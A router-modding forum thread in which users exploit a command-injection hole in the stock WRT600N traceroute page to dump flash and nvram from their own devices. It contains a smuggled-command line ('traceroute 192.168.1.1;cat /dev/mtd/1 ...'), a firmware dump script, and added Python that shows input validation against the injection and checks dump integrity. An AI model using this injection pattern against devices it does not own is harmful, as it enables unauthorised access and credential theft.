WRT600N tracert exploit with stock Linksys firmware

Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 18:39    Post subject: Reply with quote
shurik wrote:
Unfortunately the same effect: empty files. This time tried both mtd and mtdblock folders. Any more ideas on how to back up firmware?


I think I understand the problem. It's because we're exploiting the traceroute command we end up with the router running this:

Code:
traceroute 192.168.1.1;cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx > /tmp/tracert.txt


Which isn't what we want.

So let's make a script instead. Save this as dumpfw.sh on your memory stick:

Code:
#!/bin/sh
cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx
cat /dev/mtd/3 > /tmp/memstick/host0_part1/test/nvram.bin


Give it execute permission:

Code:
chmod 755 /tmp/memstick/host0_part1/test/dumpfw.sh


And then run it on the router:

Code:
/tmp/memstick/host0_part1/test/dumpfw.sh


Wait a minute or so as the dumping process is slow.
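
Added example, not part of the original post: it shows why the composed command line quoted above leaves an empty firmware.trx, and how a traceroute handler can keep the form field from reaching a shell at all. The command template is inferred from the command line in the post; the function names and the hostname rule are assumptions made for illustration.

```python
import ipaddress
import os
import re
import subprocess
import tempfile

def compose_unsafe(target, out="/tmp/tracert.txt"):
    # Assumed template, inferred from the command line quoted in the post:
    # the form field is pasted into a shell string ahead of "> /tmp/tracert.txt".
    return f"traceroute {target} > {out}"

def double_redirect_sizes():
    """Harmless stand-in with the same 'cmd > first > second' shape.

    The shell opens and truncates both files, but stdout ends up pointing
    only at the last one, so the first file stays empty.
    """
    with tempfile.TemporaryDirectory() as d:
        subprocess.run(["sh", "-c", "echo DATA > firmware.trx > tracert.txt"],
                       cwd=d, check=True)
        return tuple(os.path.getsize(os.path.join(d, n))
                     for n in ("firmware.trx", "tracert.txt"))

# One DNS label: letters, digits, inner hyphens, at most 63 characters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")

def validate_target(target):
    """Accept only an IP literal or a plain DNS hostname; reject the rest."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if len(target) <= 253 and _HOSTNAME.fullmatch(target):
        return target
    raise ValueError(f"invalid traceroute target: {target!r}")

def compose_safe(target):
    # argv list for an exec-style call (no shell), so ';' and '>' are never
    # interpreted; validation also rules out a leading '-' option.
    return ["traceroute", validate_target(target)]
```
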
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 18:43    Post subject: Reply with quote
After thinking about it a bit more, the chmod part probably isn't necessary (although it won't hurt).

All files on my memory stick have full read/write/execute permissions already.
shurik
DD-WRT User


Joined: 17 Feb 2008
Posts: 52

PostPosted: Tue Apr 22, 2008 19:32    Post subject: Reply with quote
Transient wrote:
shurik wrote:
Unfortunately the same effect: empty files. This time tried both mtd and mtdblock folders. Any more ideas on how to back up firmware?


I think I understand the problem. It's because we're exploiting the traceroute command we end up with the router running this:

Code:
traceroute 192.168.1.1;cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx > /tmp/tracert.txt


Which isn't what we want.

So let's make a script instead. Save this as dumpfw.sh on your memory stick:

Code:
#!/bin/sh
cat /dev/mtd/1 > /tmp/memstick/host0_part1/test/firmware.trx
cat /dev/mtd/3 > /tmp/memstick/host0_part1/test/nvram.bin


Give it execute permission:

Code:
chmod 755 /tmp/memstick/host0_part1/test/dumpfw.sh


And then run it on the router:

Code:
/tmp/memstick/host0_part1/test/dumpfw.sh


Wait a minute or so as the dumping process is slow.


attached is the result. Can you see if the dump is indeed complete?



WRT600N v1.01.35 build 5.zip
 Description:
WRT600N 1.01.35 build 5 Stock firmware
Manufactured 01/2008
MNR0008106845

Download
 Filename:  WRT600N v1.01.35 build 5.zip
 Filesize:  7.45 MB
 Downloaded:  804 Time(s)

nightwalk
DD-WRT Novice


Joined: 13 Apr 2008
Posts: 23

PostPosted: Tue Apr 22, 2008 20:20    Post subject: Reply with quote
I don't think the build 5 flashdump is useful as we need the build 3 1.01.36 flashdump at the time being...anyone gonna post it perhaps?
shaddie
DD-WRT Novice


Joined: 14 Apr 2008
Posts: 10

PostPosted: Tue Apr 22, 2008 20:20    Post subject: Flashed Reply with quote
The little javascript exploit worked perfectly.

I chose the route of installing that telnet daemon via usb key. Just find your path using the storage option on the actual linksys firmware. It will be something like host0_part1. Just substitute that into the command he gives.

I was actually about to give up on flashing it until I found that. It made things considerably easier.

Thanks to the poster, Transient. It worked perfectly, but now I'm in the same boat as several others with non-functional switchports. Hopefully a more recent firmware will fix it :D

Also the telnet thing works pretty well, and even responds with CRC OK and stuff whenever you update the firmware.
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 20:31    Post subject: Reply with quote
nightwalk wrote:
I don't think the build 5 flashdump is useful as we need the build 3 1.01.36 flashdump at the time being...anyone gonna post it perhaps?


Well, it's useful if you want to return to the official Linksys firmware (and regain Ethernet ports) since this version isn't posted on Linksys's website.

It would be nice if someone would post 1.01.36 build 3 though!
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 20:35    Post subject: Re: Flashed Reply with quote
shaddie wrote:
The little javascript exploit worked perfectly.

I chose the route of installing that telnet daemon via usb key. Just find your path using the storage option on the actual linksys firmware. It will be something like host0_part1. Just substitute that into the command he gives.

I was actually about to give up on flashing it until I found that. It made things considerably easier.

Thanks to the poster, Transient. It worked perfectly, but now I'm in the same boat as several others with non-functional switchports. Hopefully a more recent firmware will fix it :D

Also the telnet thing works pretty well, and even responds with CRC OK and stuff whenever you update the firmware.


I'm glad to hear it helped! I'm embarrassed to say that I spent about 4 hours trying to "fix" it until I realized the problem was simply that every command must end with a ;
shaddie
DD-WRT Novice


Joined: 14 Apr 2008
Posts: 10

PostPosted: Tue Apr 22, 2008 20:52    Post subject: Reply with quote
Once I got to the console it was all smooth for me.

Took like 5-10 minutes once in ddwrt!

I kept thinking I did it when I would try the other approaches. Watch the progress bar for 5 minutes. Reboot. Still build 5 lol hah. I'm sure I was just fat-fingering it someplace .. but console ftw.

I'd say your way is by far the simplest approach. There's almost no trial and error and you get responses.

Once I figure out what's up with the switchports I feel things will be much better ^_^.
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 21:27    Post subject: Reply with quote
shurik wrote:
attached is the result. Can you see if the dump is indeed complete?


Good news! I was able to successfully extract your "build 5" firmware trx using firmware_mod_kit.
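
Added example, not part of the original posts: one way to answer "is the dump complete?" before attempting extraction, by checking the TRX header of a dumped partition. The 28-byte little-endian header layout and the CRC convention follow the publicly known Broadcom TRX v1 format and are not stated in this thread; the function names are hypothetical, the sample image is constructed, and the image is assumed to start at offset 0 of the dump.

```python
import struct
import zlib

TRX_MAGIC = b"HDR0"
# magic, len, crc32, flags, version, offsets[3]; all little-endian, 28 bytes
TRX_HEADER = struct.Struct("<4sIIHH3I")
CRC_START = 12  # the checksum covers everything after the crc32 field

def trx_crc(data):
    # TRX stores the CRC-32 without the final bit inversion zlib applies.
    return zlib.crc32(data) ^ 0xFFFFFFFF

def build_sample_trx(payload):
    """Constructed test image (not real firmware) with a valid header."""
    body = struct.pack("<HH3I", 0, 1, TRX_HEADER.size, 0, 0) + payload
    return struct.pack("<4sII", TRX_MAGIC, CRC_START + len(body),
                       trx_crc(body)) + body

def check_trx_dump(dump):
    """Return 'ok' or a short reason why the dump is not a complete image."""
    if len(dump) < TRX_HEADER.size:
        return "too short for a TRX header"
    magic, length, crc, _flags, _version, *offsets = TRX_HEADER.unpack_from(dump)
    if magic != TRX_MAGIC:
        return "no TRX magic at offset 0"
    if length < TRX_HEADER.size:
        return "implausible length field"
    if length > len(dump):
        return "truncated: header claims more bytes than the dump holds"
    if any(off >= length for off in offsets):
        return "section offset outside image"
    if trx_crc(dump[CRC_START:length]) != crc:
        return "CRC mismatch"
    return "ok"
```

A raw partition dump is normally larger than the image it holds, so the check uses the header's length field and ignores the trailing padding. An empty file, the symptom reported earlier in the thread, fails the first test.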
alankligman
DD-WRT Novice


Joined: 21 Apr 2008
Posts: 9

PostPosted: Tue Apr 22, 2008 21:38    Post subject: Reply with quote
shaddie wrote:
Once I got to the console it was all smooth for me.

Took like 5-10 minutes once in ddwrt!

I kept thinking I did it when I would try the other approaches. Watch the progress bar for 5 minutes. Reboot. Still build 5 lol hah. I'm sure I was just fat-fingering it someplace .. but console ftw.

I'd say your way is by far the simplest approach. There's almost no trial and error and you get responses.

Once I figure out what's up with the switchports I feel things will be much better ^_^.


I spent some time on this yesterday but I didn't make much progress. The router is seeing traffic on the switch ports, but it's not being handled. It doesn't feel like a driver issue, though...
shurik
DD-WRT User


Joined: 17 Feb 2008
Posts: 52

PostPosted: Tue Apr 22, 2008 21:53    Post subject: Reply with quote
Transient wrote:
shurik wrote:
attached is the result. Can you see if the dump is indeed complete?


Good news! I was able to successfully extract your "build 5" firmware trx using firmware_mod_kit.


Glad to be of help to all who were stuck with dd-wrt and no LAN ports. I will wait with my own experiments until the bug is fixed.
shaddie
DD-WRT Novice


Joined: 14 Apr 2008
Posts: 10

PostPosted: Tue Apr 22, 2008 22:14    Post subject: Reply with quote
alankligman, I'll be home in a little bit to test it more.

I recall there being link lights. I agree about it not being a driver issue, especially if there is data. It *seems* like you wouldn't even get any kind of link without functional drivers. I don't know much about drivers and DDWRT though :/

We'll just have to see!
Transient
DD-WRT User


Joined: 16 Jun 2006
Posts: 91

PostPosted: Tue Apr 22, 2008 22:31    Post subject: Reply with quote
shaddie wrote:
alankligman, I'll be home in a little bit to test it more.

I recall there being link lights. I agree about it not being a driver issue, especially if there is data. It *seems* like you wouldn't even get any kind of link without functional drivers. I don't know much about drivers and DDWRT though :/

We'll just have to see!


Perhaps it's the vlan port bindings? I'd try playing with vlan0ports and vlan1ports. On mine CPU is port 8, maybe on yours (and others with non-functional ports) it is different.

http://www.dd-wrt.com/wiki/index.php/Switched_Ports
alankligman
DD-WRT Novice


Joined: 21 Apr 2008
Posts: 9

PostPosted: Tue Apr 22, 2008 23:50    Post subject: Reply with quote
Transient wrote:
shaddie wrote:
alankligman, I'll be home in a little bit to test it more.

I recall there being link lights. I agree about it not being a driver issue, especially if there is data. It *seems* like you wouldn't even get any kind of link without functional drivers. I don't know much about drivers and DDWRT though :/

We'll just have to see!


Perhaps it's the vlan port bindings? I'd try playing with vlan0ports and vlan1ports. On mine CPU is port 8, maybe on yours (and others with non-functional ports) it is different.

http://www.dd-wrt.com/wiki/index.php/Switched_Ports


My router is showing "vlan0ports=1 2 3 4 8*" and "vlan2ports=0 8*". No value for vlan1ports is set.
MaZe
DD-WRT Novice


Joined: 23 Apr 2008
Posts: 14

PostPosted: Wed Apr 23, 2008 2:12    Post subject: Reply with quote
1.01.36 build 3 mtdblock/{0,1,2} in attachment
(since 3,4 seem to contain nvram settings/password/mac addresses, etc)



mtdblock-2.bin
 Description:
WRT600N 1.01.36 build 3 mtdblock/2 extract

Download
 Filename:  mtdblock-2.bin
 Filesize:  6.63 MB
 Downloaded:  701 Time(s)


mtdblock-1.bin
 Description:
WRT600N 1.01.36 build 3 mtdblock/1 extract

Download
 Filename:  mtdblock-1.bin
 Filesize:  7.63 MB
 Downloaded:  739 Time(s)


mtdblock-0.bin
 Description:
WRT600N 1.01.36 build 3 mtdblock/0 extract

Download
 Filename:  mtdblock-0.bin
 Filesize:  256 KB
 Downloaded:  682 Time(s)
